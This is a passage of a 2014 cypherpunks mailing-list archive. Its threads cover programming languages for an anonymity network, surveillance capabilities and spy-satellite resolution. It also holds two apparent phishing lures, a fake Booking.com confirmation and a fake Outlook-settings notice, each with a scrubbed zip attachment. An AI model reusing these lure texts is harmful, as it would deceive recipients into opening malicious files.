Lua bindings but I don't know how mature they are. I don't think it's garbage collected which adds a bit of work to the securing part of the job. I don't know about crypto support. C) Golang is memory safe and bounds-checked, and garbage-collected, but unlike Dlang lacks scripting bindings AFAIK, and is "too" strict. It's not multi-paradigm, perhaps too stuck in the "Look like C" mud. Personally, I don't like or recommend Golang, but I mention it because unlike the above, it has *excellent* crypto-support in an external, but officially supported, library set. ..and then there's scripting languages, which (if written correctly) can be competitive on speed, benefit from JIT, and have the large advantage of not requiring compilation prior to use. That means, not worrying about deterministic builds, because the source is the program. Of these, Python and Lua are the only ones I'd consider; former is mature, powerful, and has huge library support. The latter is barebones and would need additional libraries to work, but if you stick to the somewhat outdated Lua 5.1 you can use LuaJIT which is considered the fastest scripting language out there, faster even than some compiled languages. Python does have PyPy, but it's such a nightmare to compile I'm not a big fan. Both Lua and Python have bindings to libsodium and libnacl. Some precedent: Bitmessage was supposed to be traffic-analysis resilient, and used an odd stream-based discovery system. It was written entirely in Python with a Qt frontend. On 18/04/14 09:26, Stevens Le Blond wrote: > > Hello, > > We are a team of researchers working on the design and implementation of > a traffic-analysis resistant anonymity network and we would like to > request your opinion regarding the choice of a programming language / > environment. Here are the criteria: > > 1) Familiarity: The language should be familiar or easy to learn for > most potential contributors, as we hope to build a diverse community > that builds on and contributes to the code. > > 2) Maturity: The language implementation, tool chain and libraries > should be mature enough to support a production system. > > 3) Language security: The language should minimize the risk of security > relevant bugs like buffer overflows. > > 4) Security of runtime / tool chain: It should be hard to > inconspicuously backdoor the tool chain and, if applicable, runtime > environments. > > To give two concrete examples: > > Using the C language + deterministic builds is an attractive option with > respect to 1), 2) and 4), but doesn’t provide much regarding 3). > > Java does better with respect to 3), however, it trades some of 3) and > 4) as compared to C. Specifically, we are concerned that large runtimes > may be difficult to audit. A similar argument may apply to other > interpreted languages. > > Given these criteria, what language would you choose and for what > reasons? We would also appreciate feedback regarding our criteria. > > All the best, > David, Nick, Peter, Stevens, and William > -- T: @onetruecathal, @IndieBBDNA P: +353876363185 W: http://indiebiotech.com -------------- next part -------------- A non-text attachment was scrubbed... Name: 0x988B9099.asc Type: application/pgp-keys Size: 6176 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 901 bytes Desc: OpenPGP digital signature URL: From tedks at riseup.net Fri Apr 18 10:41:11 2014 From: tedks at riseup.net (Ted Smith) Date: Fri, 18 Apr 2014 13:41:11 -0400 Subject: [tor-talk] Programming language for anonymity network In-Reply-To: <5350E1BD.5010304@mpi-sws.org> References: <5350E1BD.5010304@mpi-sws.org> Message-ID: <1397842871.5862.11.camel@anglachel> OCaml. http://ocaml.org/ 1. OCaml is more obscure than many languages, but it supports programming in imperative, object-oriented, and functional styles (though it's obviously best suited for a functional style). I've seen people write Java in OCaml and produce clean, modular code. 2. OCaml is used in industrial environments (it's gotten pretty popular on Wall Street) and in open-source projects; the toolchain is mature and the community is vibrant. 3. OCaml is memory safe, but more importantly, it's type safe, and its type system is capable of encoding a great deal of your program's correctness. It will take some time to get your program to compile, but when it does you have a much stronger assurance that your program is correct than you do in C, C++, or Java. 4. OCaml compiles to native code; I'm not sure if deterministic builds have been done but they should be possible. 5. (Performance, the hidden elephant in every language discussion room) The OCaml team takes security seriously, and OCaml is performance-competitive with C. OCaml does tail-call elimination, so you can write programs functionally that are memory-efficient. 6. (Weaknesses) OCaml has a global lock due to its garbage collection, so parallel programming has to be done with processes. This is (IMO) cleaner than in similar situations like Python, but is obviously suboptimal. I'd highly recommend reading through this blog series, chronicling a developer picking OCaml as the language to rewrite a large Python open-source project in. It doesn't have the same focus as you, but it goes over various reasons why someone might switch to OCaml, and introduces some OCaml features: http://roscidus.com/blog/blog/categories/ocaml/ On Fri, 2014-04-18 at 10:26 +0200, Stevens Le Blond wrote: > Hello, > > We are a team of researchers working on the design and implementation of > a traffic-analysis resistant anonymity network and we would like to > request your opinion regarding the choice of a programming language / > environment. Here are the criteria: > > 1) Familiarity: The language should be familiar or easy to learn for > most potential contributors, as we hope to build a diverse community > that builds on and contributes to the code. > > 2) Maturity: The language implementation, tool chain and libraries > should be mature enough to support a production system. > > 3) Language security: The language should minimize the risk of security > relevant bugs like buffer overflows. > > 4) Security of runtime / tool chain: It should be hard to > inconspicuously backdoor the tool chain and, if applicable, runtime > environments. > > To give two concrete examples: > > Using the C language + deterministic builds is an attractive option with > respect to 1), 2) and 4), but doesn’t provide much regarding 3). > > Java does better with respect to 3), however, it trades some of 3) and > 4) as compared to C. Specifically, we are concerned that large runtimes > may be difficult to audit. A similar argument may apply to other > interpreted languages. > > Given these criteria, what language would you choose and for what > reasons? We would also appreciate feedback regarding our criteria. > > All the best, > David, Nick, Peter, Stevens, and William > -- Sent from Ubuntu -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: This is a digitally signed message part URL: From juan.g71 at gmail.com Fri Apr 18 10:01:52 2014 From: juan.g71 at gmail.com (Juan) Date: Fri, 18 Apr 2014 14:01:52 -0300 Subject: NSA good guys In-Reply-To: <20140418020936.D82A62280DC@palinka.tinho.net> References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> Message-ID: <535184aa.0562340a.0d71.ffffd9d1@mx.google.com> On Thu, 17 Apr 2014 22:09:36 -0400 dan at geer.org wrote: > > | > | It may be possible, in the not-so-distant-future, to record > | people in ultra high definition from a mile away, but the > | 'technology' can be rendered rather useless with somthing > | like...this > | > | > http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg | > > > At this time, it is possible to do facial recognition at 500 meters, > iris recognition at 50 meters, and heartbeat recognition at 5 meters. > A newspaper open on a table can be read from orbit. DNA samples > can be matched in under half a hour. Your smartphone can identify > your gait, your face in that selfie, the idiosyncracies of your > typing, your fingerprint and/or anything else you wish to lay on > the screen. Light fixtures in public venues provide light but also > house a camera, sensors for CO/CO2/pollutant emissions, seismic > activity, humidity & UV radiation, a microphone, wifi and/or cellular > interfaces, an extensible API, an IPv4 or v6 address per LED, a > capacity for disconnected "decision making on the pole," and > cloud-based remote management. Every cow you eat is tracked cradle > to grave with RFID tagging under the National Animal Identification > System, the infrastructure for which handles 100 million cattle and > works for any mammal, of which you are one. Any newish car is > broadcasting several Bluetooth beacons as is your newish iPhone. > Forensics can now match photo to camera as crisply as matching > bullet to barrel. The Smart Meter soon to be imposed on your > electric tap will know everything you own, and report. More and > more people you meet will be part of the system -- that wearables > like Google Glass are so readily detectible is just a brief moment > in time. Cars are soon to be mandated to implement wireless > vehicle-to-vehicle (V2V) and vehicle to infrastructure (V2I) > communications using extensible protocols intended to include > route-based payment now that too many people are driving green cars. > Your various insurers will buy your data for a pittance of discount > but will also know when, say, blood pressure for everyone in the > house or the neighborhood rises together. A wife may not be impelled > to testify against a husband, but cannot her digital exhaust be > subpoenaed to the same effect? > > > But you know all that, paper hospital masks notwithstanding. Well, the scenario you paint is scary and looks a bit like science fiction. On one hand I do get your point. On the other hand I can't help but mention again that your iris-recognition-from-orbit can be defeated with $5 contact lenses. Other 'technologies' can certainly be more intrusive. >The Smart Meter soon to be imposed >Cars are soon to be mandated to implement Mandated by?...by jesus...or by the american government, which amounts to the same thing. Anyway, all this is of course a political problem and so it requires a political solution. A solution that government, which is the driving force behind the problem, isn't going to provide. > > --dan > From bmanning at isi.edu Fri Apr 18 15:34:38 2014 From: bmanning at isi.edu (Manning-ISI) Date: Fri, 18 Apr 2014 15:34:38 -0700 Subject: NSA good guys In-Reply-To: <535184aa.0562340a.0d71.ffffd9d1@mx.google.com> References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <535184aa.0562340a.0d71.ffffd9d1@mx.google.com> Message-ID: <6A28B4E1-F199-4103-8416-1AE800132205@isi.edu> On 18April2014Friday, at 10:01, Juan wrote: > On Thu, 17 Apr 2014 22:09:36 -0400 > dan at geer.org wrote: > >> >> | >> | It may be possible, in the not-so-distant-future, to record >> | people in ultra high definition from a mile away, but the >> | 'technology' can be rendered rather useless with somthing >> | like...this >> | >> | >> http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg | >> >> >> At this time, it is possible to do facial recognition at 500 meters, >> iris recognition at 50 meters, and heartbeat recognition at 5 meters. [ dans plausable near future description elided] >> >> But you know all that, paper hospital masks notwithstanding. > > > Well, the scenario you paint is scary and looks a bit like > science fiction. On one hand I do get your point. On the other > hand I can't help but mention again that your > iris-recognition-from-orbit can be defeated with $5 contact > lenses. Other 'technologies' can certainly be more intrusive. you mean like these guys? http://en.wikipedia.org/wiki/Google_Contact_Lens > > >The Smart Meter soon to be imposed by SoCalEd & PGE in California... > > >Cars are soon to be mandated to implement Japan is clearly headed in that direction... > > Mandated by?...by jesus...or by the american government, which > amounts to the same thing. > > Anyway, all this is of course a political problem and so it > requires a political solution. Actually, its an economics problem... > > > > > >> >> --dan >> > From jamesdbell9 at yahoo.com Fri Apr 18 17:02:25 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Fri, 18 Apr 2014 17:02:25 -0700 (PDT) Subject: NSA good guys In-Reply-To: <20140418020936.D82A62280DC@palinka.tinho.net> References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> Message-ID: <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> From: "dan at geer.org" |     It may be possible, in the not-so-distant-future, to record |     people in ultra high definition from a mile away, but the |     'technology'  can be rendered rather useless with somthing |     like...this | |     http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg | >At this time, it is possible to do facial recognition at 500 meters, >iris recognition at 50 meters, and heartbeat recognition at 5 meters. >A newspaper open on a table can be read from orbit.  I strongly doubt the part about reading the newspaper from orbit.  I don't doubt that the pattern of text and pictures on the  front page could be identified from orbit. ('Identifying the difference between Pravda and Izvestia'.)   An approximation I once heard is that a lens or mirror of about 4.5 inch in diameter can resolve an angle of one arc-second.  A mirror of the size of the Hubble Space Telescope (which I assume approximates that of the typical spy satellite today) is about 20x larger, so the resolution should be 20x better, or 1/20 arc-second.  That's 1/(57 degrees per radian)(3600arcseconds per degree)(20) = 1/4,100,000 radian.  From an altitude of 500 kilometers, that's about 1/8 of a meter, or 120 millimeter.  Maybe that's a pixel-pair, but it's far too large to resolve the text on a newspaper.   The best prospect to improve on this resolution would be to use a 'multiple-mirror-telescope' technology.  Light-gathering capability isn't important in this application; high resolution is.  Making a spy-telescope out of a few different mirrors, held precisely many meters apart, could conceivable achieve resolutions substantially greater than this.         Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2850 bytes Desc: not available URL: From cathalgarvey at cathalgarvey.me Fri Apr 18 11:18:13 2014 From: cathalgarvey at cathalgarvey.me (Cathal Garvey (Phone)) Date: Fri, 18 Apr 2014 19:18:13 +0100 Subject: [tor-talk] Programming language for anonymity network In-Reply-To: <1397842871.5862.11.camel@anglachel> References: <5350E1BD.5010304@mpi-sws.org> <1397842871.5862.11.camel@anglachel> Message-ID: <83fae3b5-4688-4351-8455-53f9cefe49ab@email.android.com> Actually process-based parallelism is supported in more recent pythons, for the reason that using processes passes management largely to the OS. It's not the only way to do Parallelism but it's recommended by some. Thanks for suggesting Ocaml: have seen it recommended a lot lately, better check it out. On 18 April 2014 18:41:11 GMT+01:00, Ted Smith wrote: >OCaml. http://ocaml.org/ > > 1. OCaml is more obscure than many languages, but it supports > programming in imperative, object-oriented, and functional > styles (though it's obviously best suited for a functional > style). I've seen people write Java in OCaml and produce clean, > modular code. > 2. OCaml is used in industrial environments (it's gotten pretty > popular on Wall Street) and in open-source projects; the > toolchain is mature and the community is vibrant. > 3. OCaml is memory safe, but more importantly, it's type safe, and > its type system is capable of encoding a great deal of your > program's correctness. It will take some time to get your > program to compile, but when it does you have a much stronger > assurance that your program is correct than you do in C, C++, or > Java. > 4. OCaml compiles to native code; I'm not sure if deterministic > builds have been done but they should be possible. > 5. (Performance, the hidden elephant in every language discussion > room) The OCaml team takes security seriously, and OCaml is > performance-competitive with C. OCaml does tail-call > elimination, so you can write programs functionally that are > memory-efficient. > 6. (Weaknesses) OCaml has a global lock due to its garbage > collection, so parallel programming has to be done with > processes. This is (IMO) cleaner than in similar situations like > Python, but is obviously suboptimal. > >I'd highly recommend reading through this blog series, chronicling a >developer picking OCaml as the language to rewrite a large Python >open-source project in. It doesn't have the same focus as you, but it >goes over various reasons why someone might switch to OCaml, and >introduces some OCaml features: >http://roscidus.com/blog/blog/categories/ocaml/ > > > >On Fri, 2014-04-18 at 10:26 +0200, Stevens Le Blond wrote: >> Hello, >> >> We are a team of researchers working on the design and implementation >of >> a traffic-analysis resistant anonymity network and we would like to >> request your opinion regarding the choice of a programming language / >> environment. Here are the criteria: >> >> 1) Familiarity: The language should be familiar or easy to learn for >> most potential contributors, as we hope to build a diverse community >> that builds on and contributes to the code. >> >> 2) Maturity: The language implementation, tool chain and libraries >> should be mature enough to support a production system. >> >> 3) Language security: The language should minimize the risk of >security >> relevant bugs like buffer overflows. >> >> 4) Security of runtime / tool chain: It should be hard to >> inconspicuously backdoor the tool chain and, if applicable, runtime >> environments. >> >> To give two concrete examples: >> >> Using the C language + deterministic builds is an attractive option >with >> respect to 1), 2) and 4), but doesn’t provide much regarding 3). >> >> Java does better with respect to 3), however, it trades some of 3) >and >> 4) as compared to C. Specifically, we are concerned that large >runtimes >> may be difficult to audit. A similar argument may apply to other >> interpreted languages. >> >> Given these criteria, what language would you choose and for what >> reasons? We would also appreciate feedback regarding our criteria. >> >> All the best, >> David, Nick, Peter, Stevens, and William >> > >-- >Sent from Ubuntu -- Sent from my Android device with K-9 Mail. Please excuse my brevity. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4731 bytes Desc: not available URL: From coderman at gmail.com Fri Apr 18 20:25:49 2014 From: coderman at gmail.com (coderman) Date: Fri, 18 Apr 2014 20:25:49 -0700 Subject: [liberationtech] Programming language for anonymity network In-Reply-To: <5350E1BD.5010304@mpi-sws.org> References: <5350E1BD.5010304@mpi-sws.org> Message-ID: On Fri, Apr 18, 2014 at 1:26 AM, Stevens Le Blond wrote: >... > We are a team of researchers working on the design and implementation of > a traffic-analysis resistant anonymity network... is this an implementation of existing research, or experimentation with novel architectures? tell us more :) > ... and we would like to > request your opinion regarding the choice of a programming language / > environment. Here are the criteria:... > 1) Familiarity: ... > 2) Maturity: ... > 3) Language security: ... > 4) Security of runtime / tool chain:.. use modern C++ with testing discipline. , but what about this traffic analysis resistant anonymity network, low latency too? *grin* best regards, From coderman at gmail.com Fri Apr 18 20:34:29 2014 From: coderman at gmail.com (coderman) Date: Fri, 18 Apr 2014 20:34:29 -0700 Subject: NSA good guys In-Reply-To: References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> Message-ID: On Fri, Apr 18, 2014 at 5:46 AM, John Young wrote: > ... Kickstart a > religion, call it Darksec. Give away free, with 3D funny > hats and walks and masks. Beguile officials into > raiding your printer buried under Hettinga's compost > of coconut shell Bitcoins. damnit John, that was only going to work when they didn't know it was a trap... -_- From customer.service at booking.com Fri Apr 18 13:18:31 2014 From: customer.service at booking.com (Booking.com) Date: Fri, 18 Apr 2014 21:18:31 +0100 Subject: Your reservation is now confirmed! Message-ID: Thanks! Your reservation is now confirmed. Booking number: 315625687 PIN Code: 8467 Email: cypherpunks at jfet.org Your reservation: 1 night, 1 room Check in: Monday, April 28, 2014 (2:00 pm - 00:00 am) Check out: Tuesday, April 29, 2014 (until 12:00 pm) Superior Double Room $1,799.68 VAT (20%) included $449.92 Total Price $2,249.60 Please note: additional supplements (e.g. extra bed) are not added to this total. The total price shown is the amount you will pay to the property. Booking.com does not charge any reservation, administration or other fees. You can easily change or cancel this booking for free before August 6 - 2013, to cancel or modify your reservation please complete the attached form and fax it to: +1 888 850 3067 Have a great trip! - The Booking.com Team Copyright 1996 - 2013 Booking.com. All rights reserved. This email was sent by Booking.com, Herengracht 597, 1017 CE Amsterdam, Netherlands -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 15901 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: Booking number 315625687.zip Type: application/zip Size: 6598 bytes Desc: not available URL: From Administrator at jfet.org Fri Apr 18 15:14:28 2014 From: Administrator at jfet.org (Administrator) Date: Fri, 18 Apr 2014 22:14:28 +0000 Subject: Important - New Outlook Settings Message-ID: Please carefully read the attached instructions before updating settings. This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk at jfet.org and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it. -------------- next part -------------- A non-text attachment was scrubbed... Name: OutlookSettings.zip Type: application/zip Size: 6598 bytes Desc: not available URL: From juan.g71 at gmail.com Fri Apr 18 21:31:38 2014 From: juan.g71 at gmail.com (Juan) Date: Sat, 19 Apr 2014 01:31:38 -0300 Subject: NSA good guys In-Reply-To: <6A28B4E1-F199-4103-8416-1AE800132205@isi.edu> References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <535184aa.0562340a.0d71.ffffd9d1@mx.google.com> <6A28B4E1-F199-4103-8416-1AE800132205@isi.edu> Message-ID: <5352265a.89bc340a.1b27.fffff301@mx.google.com> On Fri, 18 Apr 2014 15:34:38 -0700 Manning-ISI wrote: > >. Other 'technologies' can certainly be more > > intrusive. > > you mean like these guys? > http://en.wikipedia.org/wiki/Google_Contact_Lens Yes...That isn't...encouraging. > > > > > > >The Smart Meter soon to be imposed > > by SoCalEd & PGE in California... > > > > > >Cars are soon to be mandated to implement > > Japan is clearly headed in that direction... > > > > Mandated by?...by jesus...or by the american government, > > which amounts to the same thing. > > > > Anyway, all this is of course a political problem and so it > > requires a political solution. > > Actually, its an economics problem... Care to elaborate? > > > > > > > > > > > > >> > >> --dan > >> > > > From jya at pipeline.com Sat Apr 19 07:43:11 2014 From: jya at pipeline.com (John Young) Date: Sat, 19 Apr 2014 10:43:11 -0400 Subject: Inevitable Security Critiques, Promises and Lemons Message-ID: Gratifying to see a few of those here featured in NY Times today discussing inevitable failures and contradictions in security: http://www.nytimes.com/2014/04/19/technology/heartbleed-highlights-a-contradiction-in-the-web.html To be read with Schneier's 2007 account of inevitable security lemons (resurrected by Coderman): https://www.schneier.com/blog/archives/2007/04/a_security_mark.html Our security consumer advice based on frank, honest and distrustful discussions here for nearly 18 years: "Unreliable SSL has been uninstalled. All security and privacy policies are unreliable. Protect yourself against security and privacy promise." Still hopeful Hettinga will plug these insider breaches of why marketing lemonade is so lucratively persuasive to those who know better. And who do not disclose here. From jamesdbell9 at yahoo.com Sat Apr 19 10:44:50 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Sat, 19 Apr 2014 10:44:50 -0700 (PDT) Subject: Fw: NSA good guys In-Reply-To: <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> Message-ID: <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> [I didn't get a bounce off of CP the first time] From: "dan at geer.org" |     It may be possible, in the not-so-distant-future, to record |     people in ultra high definition from a mile away, but the |     'technology'  can be rendered rather useless with somthing |     like...this | |     http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg | >At this time, it is possible to do facial recognition at 500 meters, >iris recognition at 50 meters, and heartbeat recognition at 5 meters. >A newspaper open on a table can be read from orbit.  I strongly doubt the part about reading the newspaper from orbit.  I don't doubt that the pattern of text and pictures on the  front page could be identified from orbit. ('Identifying the difference between Pravda and Izvestia'.)   An approximation I once heard is that a lens or mirror of about 4.5 inch in diameter can resolve an angle of one arc-second.  A mirror of the size of the Hubble Space Telescope (which I assume approximates that of the typical spy satellite today) is about 20x larger, so the resolution should be 20x better, or 1/20 arc-second.  That's 1/(57 degrees per radian)(3600arcseconds per degree)(20) = 1/4,100,000 radian.  From an altitude of 500 kilometers, that's about 1/8 of a meter, or 120 millimeter.  Maybe that's a pixel-pair, but it's far too large to resolve the text on a newspaper.   The best prospect to improve on this resolution would be to use a 'multiple-mirror-telescope' technology.  Light-gathering capability isn't important in this application; high resolution is.  Making a spy-telescope out of a few different mirrors, held precisely many meters apart, could conceivable achieve resolutions substantially greater than this.         Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4095 bytes Desc: not available URL: From shelley at misanthropia.info Sat Apr 19 11:59:36 2014 From: shelley at misanthropia.info (shelley at misanthropia.info) Date: Sat, 19 Apr 2014 11:59:36 -0700 Subject: Fw: NSA good guys In-Reply-To: <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> Message-ID: <1397933976.16040.108223289.7D1D208F@webmail.messagingengine.com> On Sat, Apr 19, 2014, at 10:44 AM, jim bell wrote: > [I didn't get a bounce off of CP the first time] Jim, it did post to the list the first time. This has happened to me before, as well: I've received an off-list reply from someone to a message (sent only to the list) long before I saw it post on the list. There is often a delay and I'm not sure why; I'll look at the path in headers the next time it happens. (Also, on-topic: you make some good points here!) > From: "" <> > > |     It may be possible, in the not-so-distant-future, to record > |     people in ultra high definition from a mile away, but the > |     'technology'  can be rendered rather useless with somthing > |     like...this > | > |     > | > > > >At this time, it is possible to do facial recognition at 500 meters, > >iris recognition at 50 meters, and heartbeat recognition at 5 meters. > >A newspaper open on a table can be read from orbit.  > > I strongly doubt the part about reading the newspaper from orbit.  I > don't doubt that the pattern of text and pictures on the  front page > could be identified from orbit. ('Identifying the difference between > Pravda and Izvestia'.)   An approximation I once heard is that a lens or > mirror of about 4.5 inch in diameter can resolve an angle of one > arc-second.  A mirror of the size of the Hubble Space Telescope (which I > assume approximates that of the typical spy satellite today) is about 20x > larger, so the resolution should be 20x better, or 1/20 arc-second. > That's 1/(57 degrees per radian)(3600arcseconds per degree)(20) = > 1/4,100,000 radian.  From an altitude of 500 kilometers, that's about 1/8 > of a meter, or 120 millimeter.  Maybe that's a pixel-pair, but it's far > too large to resolve the text on a newspaper.   > > The best prospect to improve on this resolution would be to use a > 'multiple-mirror-telescope' technology.  Light-gathering capability isn't > important in this application; high resolution is.  Making a > spy-telescope out of a few different mirrors, held precisely many meters > apart, could conceivable achieve resolutions substantially greater than > this. >         Jim Bell From jamesdbell9 at yahoo.com Sat Apr 19 12:15:47 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Sat, 19 Apr 2014 12:15:47 -0700 (PDT) Subject: Fw: NSA good guys In-Reply-To: <20140419182746.GC2173@nl.grid.coop> References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> <20140419182746.GC2173@nl.grid.coop> Message-ID: <1397934947.17049.YahooMailNeo@web126202.mail.ne1.yahoo.com> From: Troy Benjegerdes To: jim bell   > [I didn't get a bounce off of CP the first time] >Izvestia'.)   An approximation I once heard is that a lens or mirror of about 4.5 inch in diameter can resolve an >>angle of one arc-second.  A mirror of the size of the Hubble Space Telescope (which I assume approximates >>that of the typical spy satellite today) is about 20x larger, so the resolution should be 20x better, or 1/20 arc->>second.  That's 1/(57 degrees per radian)(3600arcseconds per degree)(20) = 1/4,100,000 radian.  From an >>altitude of 500 kilometers, that's about 1/8 of a meter, or 120 millimeter.  Maybe that's a pixel-pair, but it's far >>too large to resolve the text on a newspaper.   >>> The best prospect to improve on this resolution would be to use a 'multiple-mirror-telescope' technology. > >Light-gathering capability isn't important in this application; high resolution is.  Making a spy-telescope out of a >>few different mirrors, held precisely many meters apart, could conceivable achieve resolutions substantially >>greater than this. >>    Jim Bell >Such a mirror array would at some point reflect enough light at odd angles to be visible with the >naked eye. >I find it more likely that multiple-mirror-telescope tech would be implemented with a swarm of small >satellites and extremely precise location tracking and a lot of signal processing later on. I sure find that difficult to imagine!  Particularly because the assemblage would presumably be flying at about 500 kilometers altitude, and would therefore be buffeted by extremely-small-but-significant orbital winds.  In addition, the amount of information that would have to be interchanged (phase and amplitude, in TWO dimensions!) of an entire field of view would be phenomenal.   What I suspect the US military would really like to see is a spy satellite at geosync altitude (22,000 miles) with an apparent aperture of perhaps 150 meters, so that it has roughly the same resolution on the ground as existing fast-orbital spy satellites.  (orbital period circa 90 minutes or so).               Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3335 bytes Desc: not available URL: From hozer at hozed.org Sat Apr 19 11:27:46 2014 From: hozer at hozed.org (Troy Benjegerdes) Date: Sat, 19 Apr 2014 13:27:46 -0500 Subject: Fw: NSA good guys In-Reply-To: <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> Message-ID: <20140419182746.GC2173@nl.grid.coop> On Sat, Apr 19, 2014 at 10:44:50AM -0700, jim bell wrote: > [I didn't get a bounce off of CP the first time] > > From: "dan at geer.org" > > |     It may be possible, in the not-so-distant-future, to record > |     people in ultra high definition from a mile away, but the > |     'technology'  can be rendered rather useless with somthing > |     like...this > | > |     http://ramitia.files.wordpress.com/2010/02/japan-face-masks.jpg > | > > > >At this time, it is possible to do facial recognition at 500 meters, > >iris recognition at 50 meters, and heartbeat recognition at 5 meters. > >A newspaper open on a table can be read from orbit.  > > I strongly doubt the part about reading the newspaper from orbit.  I don't doubt that the pattern of text and pictures on the  front page could be identified from orbit. ('Identifying the difference between Pravda and Izvestia'.)   An approximation I once heard is that a lens or mirror of about 4.5 inch in diameter can resolve an angle of one arc-second.  A mirror of the size of the Hubble Space Telescope (which I assume approximates that of the typical spy satellite today) is about 20x larger, so the resolution should be 20x better, or 1/20 arc-second.  That's 1/(57 degrees per radian)(3600arcseconds per degree)(20) = 1/4,100,000 radian.  From an altitude of 500 kilometers, that's about 1/8 of a meter, or 120 millimeter.  Maybe that's a pixel-pair, but it's far too large to resolve the text on a newspaper.   > > The best prospect to improve on this resolution would be to use a 'multiple-mirror-telescope' technology.  Light-gathering capability isn't important in this application; high resolution is.  Making a spy-telescope out of a few different mirrors, held precisely many meters apart, could conceivable achieve resolutions substantially greater than this. >         Jim Bell Such a mirror array would at some point reflect enough light at odd angles to be visible with the naked eye. I find it more likely that multiple-mirror-telescope tech would be implemented with a swarm of small satellites and extremely precise location tracking and a lot of signal processing later on. From guninski at guninski.com Sat Apr 19 06:45:10 2014 From: guninski at guninski.com (Georgi Guninski) Date: Sat, 19 Apr 2014 16:45:10 +0300 Subject: Does a society of sheep deserve a government of wolves? Message-ID: <20140419134510.GA3833@sivokote.iziade.m$> The question is: === Does a society of sheep deserve a government of wolves? === Some rants: Obama is protecting the NSA and is probably claiming "I am elected by the sheep, so the sheep are protecting the NSA". If it weren't Obama only the names will change. The majority of sheep are economically enslaved and/or brainwashed IMO. From cypher at cpunk.us Sat Apr 19 16:25:08 2014 From: cypher at cpunk.us (Cypher) Date: Sat, 19 Apr 2014 18:25:08 -0500 Subject: Does a society of sheep deserve a government of wolves? In-Reply-To: <20140419134510.GA3833@sivokote.iziade.m$> References: <20140419134510.GA3833@sivokote.iziade.m$> Message-ID: <535305D4.3020407@cpunk.us> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 04/19/2014 08:45 AM, Georgi Guninski wrote: > The question is: > > === Does a society of sheep deserve a government of wolves? If we, who know better, don't help the sheep raise out of their bondage then we become the wolves. - -- Want to communicate with me privately? Find my PGP public key here: http://pgp.mit.edu/pks/lookup?op=get&search=0x5BAEB5B2FA26826B Fingerprint: 6728 40CE 35EE 0BF3 2E15 C7CC 5BAE B5B2 FA26 826B -----BEGIN PGP SIGNATURE----- Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCgAGBQJTUwXJAAoJEFuutbL6JoJr8OEP/3lsRQFFkXhinPCNl+oZsaPm JOeu8FCywzRDK4YZEpyBypyO5W/nuGUExbIivhc1/SVg/uf2BM8dE108bESRw1YO tBucBGWtJZLyjnxTxKG0eTzPpoDxF/9Cn7y5FYN6cDvGzX8GMTcQRrZiUMPEbR7V 9OlN3RxgdrIRXefZqOXPtoqziZFmO+YQWqFSvzWEbBrrS+Zlg5sU1DBMmNURtGFf +bVSyC6uyC/gE28aAVEbxV79eEk8vuEulFkkGlNbT1dtufFvG/W3ZQ1s8heI7A5+ zQ/HyHkbLlpYQGkJhT55K2xT7yvY/mSiCRjVute5RWJd2c0rfNkGw87zP5D5hB7y JTPU41XOnW4u61TIVqHr3G/B/ll49vSK3SEccYOBFLc7wWh4vmhm8h2cN/B8/BPk QXlOrRwHFx3MnUIJ+IcP7LJrRTk+joyf5HJJTwAygeCRexo3oD9dGz+6e2UxRchV 9BAaqBdz7AUjnpwLcy0EMTwa/DAovMVCXEFR1mCg0n6p6fndbrl5uSE0qBq0agyp h+lmBd59MQmX8yqoPioeb3EXfXkXMHKozPesMpwvOchkkVPxMCkuenBARX92OBzX 